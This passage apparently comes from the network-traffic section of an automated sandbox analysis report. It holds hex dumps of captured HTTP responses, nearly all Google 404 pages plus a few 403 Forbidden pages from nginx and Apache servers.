72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1596Date: Thu, 29 Sep 2022 12:47:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1596Date: Thu, 29 Sep 2022 12:47:37 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1596Date: Thu, 29 Sep 2022 12:47:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 29 Sep 2022 12:47:40 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:47:41 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=118X-Content-Type-Options: nosniffX-Frame-Options: sameoriginUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingKeep-Alive: timeout=4, max=500Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1596Date: Thu, 29 Sep 2022 12:47:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1596Date: Thu, 29 Sep 2022 12:47:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 